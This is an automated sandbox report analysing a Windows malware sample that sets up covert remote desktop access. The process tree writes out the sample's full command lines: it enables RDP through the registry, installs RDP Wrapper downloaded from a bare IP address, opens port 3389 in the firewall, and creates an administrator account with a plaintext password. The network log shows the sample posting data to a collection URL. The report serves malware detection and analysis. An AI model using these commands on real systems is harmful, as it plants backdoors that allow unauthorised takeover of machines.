Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
67065b4c84713_Javiles.exe

Overview

General Information

Sample name:67065b4c84713_Javiles.exe
Analysis ID:1531874
MD5:8be8e5e57fc2a177c12ac52d6f71157c
SHA1:6d53911869b932db7dcbc5e9fb0c023fe3d520ad
SHA256:f1417213f43cad96ecab7f83251b963706b22e4ebe4e6b34080fc6227ee359b3
Tags:exeuser-aachum
Infos:

Detection

RDPWrap Tool
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Sigma detected: Suspicious Add User to Remote Desktop Users Group
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • 67065b4c84713_Javiles.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\67065b4c84713_Javiles.exe" MD5: 8BE8E5E57FC2A177C12AC52D6F71157C)
    • cmd.exe (PID: 7652 cmdline: "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7692 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 7708 cmdline: "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7748 cmdline: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 7764 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 7812 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 7924 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • svchost.exe (PID: 7828 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -s TermService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 7696 cmdline: "cmd.exe" /c net user JustonThompson G2ywh4BZ30yu /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7680 cmdline: net user JustonThompson G2ywh4BZ30yu /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7640 cmdline: C:\Windows\system32\net1 user JustonThompson G2ywh4BZ30yu /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7712 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7844 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7836 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7828 cmdline: "cmd.exe" /c net localgroup "Remote Desktop Users" JustonThompson /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7872 cmdline: net localgroup "Remote Desktop Users" JustonThompson /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7956 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" JustonThompson /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 7940 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7788 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 396 cmdline: "cmd.exe" /c net localgroup "Administrators" JustonThompson /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 2936 cmdline: net localgroup "Administrators" JustonThompson /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 764 cmdline: C:\Windows\system32\net1 localgroup "Administrators" JustonThompson /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
67065b4c84713_Javiles.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
      C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000009.00000000.1765768816.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000000.00000000.1703967641.0000000000482000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                  Click to see the 3 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.67065b4c84713_Javiles.exe.480000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    9.2.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                      9.2.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        9.0.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                          9.0.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                            System Summary

                            barindex
                            Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\67065b4c84713_Javiles.exe, Initiated: true, ProcessId: 7480, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
                            Source: Registry Key setAuthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 7812, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /c net localgroup "Remote Desktop Users" JustonThompson /add, CommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" JustonThompson /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\67065b4c84713_Javiles.exe", ParentImage: C:\Users\user\Desktop\67065b4c84713_Javiles.exe, ParentProcessId: 7480, ParentProcessName: 67065b4c84713_Javiles.exe, ProcessCommandLine: "cmd.exe" /c net localgroup "Remote Desktop Users" JustonThompson /add, ProcessId: 7828, ProcessName: cmd.exe
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
                            Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user JustonThompson G2ywh4BZ30yu /add, CommandLine: net user JustonThompson G2ywh4BZ30yu /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user JustonThompson G2ywh4BZ30yu /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: net user JustonThompson G2ywh4BZ30yu /add, ProcessId: 7680, ProcessName: net.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -s TermService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\67065b4c84713_Javiles.exe", ParentImage: C:\Users\user\Desktop\67065b4c84713_Javiles.exe, ParentProcessId: 7480, ParentProcessName: 67065b4c84713_Javiles.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -s TermService, ProcessId: 7828, ProcessName: svchost.exe
                            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user JustonThompson G2ywh4BZ30yu /add, CommandLine: net user JustonThompson G2ywh4BZ30yu /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user JustonThompson G2ywh4BZ30yu /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: net user JustonThompson G2ywh4BZ30yu /add, ProcessId: 7680, ProcessName: net.exe
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -s TermService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\67065b4c84713_Javiles.exe", ParentImage: C:\Users\user\Desktop\67065b4c84713_Javiles.exe, ParentProcessId: 7480, ParentProcessName: 67065b4c84713_Javiles.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -s TermService, ProcessId: 7828, ProcessName: svchost.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-11T23:07:44.257533+020028033053Unknown Traffic192.168.2.449738172.67.74.15280TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllReversingLabs: Detection: 54%
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeReversingLabs: Detection: 68%
                            Source: 67065b4c84713_Javiles.exeReversingLabs: Detection: 87%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoe Sandbox ML: detected
                            Source: 67065b4c84713_Javiles.exeJoe Sandbox ML: detected
                            Source: 67065b4c84713_Javiles.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                            Source: 67065b4c84713_Javiles.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: 67065b4c84713_Javiles.exe
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1Nullable`1IEnumerable`1Task`1TaskAwaiter`1ToInt32<faker>5__2<>u__2Func`2Dictionary`2ToInt64<Main>d__4<>9<Module><Main>GetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlibset_Verb<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.bogus.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceCompressionModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileIsInRoleWindowsBuiltInRoleget_MainModuleProcessModuleGetOSNameGetGPUNameget_Nameget_FileNameset_FileNameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNameLastNameFirstNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.ThreadingSystem.Runtime.VersioningMappingDownloadStringCultureToStringAttachzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockget_TaskSystem.Security.PrincipalWindowsPrincipalProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramget_Itemset_ItemSystemTrimRandomrandomSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonpatternCopyToget_CultureInfoSystemInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqStreamReaderTextReaderAssemblyLoaderAsyncTaskMethodBuilder<>t__builderGendersenderManagementObjectSearcherFakerResolveEventHandlerRDPInstallerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreatorIsRunAsAdministrator.ctor.cctorMonitorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsGetCurrentProcessBogus.DataSetsSystem.Net.SocketsExistsBogusOpen.NatConcatManagementBaseObjectManagementObjectSelectBeginConnectGetSystem.NetWaitForExitFirstOrDefaultIAsyncResultGetResultSetResultToLowerInvariantWebClien
                            Source: Binary string: costura.costura.pdb.compressed source: 67065b4c84713_Javiles.exe
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdb source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.9.dr, RDPWInst.exe.0.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.9.dr, RDPWInst.exe.0.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: 67065b4c84713_Javiles.exe
                            Source: Binary string: C:\DEV\C#\RDPCreator\RDPCreator\obj\Release\RDPCreator.pdb source: 67065b4c84713_Javiles.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: 67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmp
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_004092D8 FindFirstFileW,FindClose,9_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0040F73C FindFirstFileW,FindClose,9_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,9_2_00408EB9

                            Networking

                            barindex
                            Source: Yara matchFile source: 9.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RDPWInst.exe PID: 7812, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.4:49739 -> 8.46.123.33:3389
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 11 Oct 2024 21:07:01 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: POST /core/receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 190Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                            Source: Joe Sandbox ViewIP Address: 8.46.123.33 8.46.123.33
                            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                            Source: Joe Sandbox ViewASN Name: AS-PUBMATICUS AS-PUBMATICUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 172.67.74.152:80
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
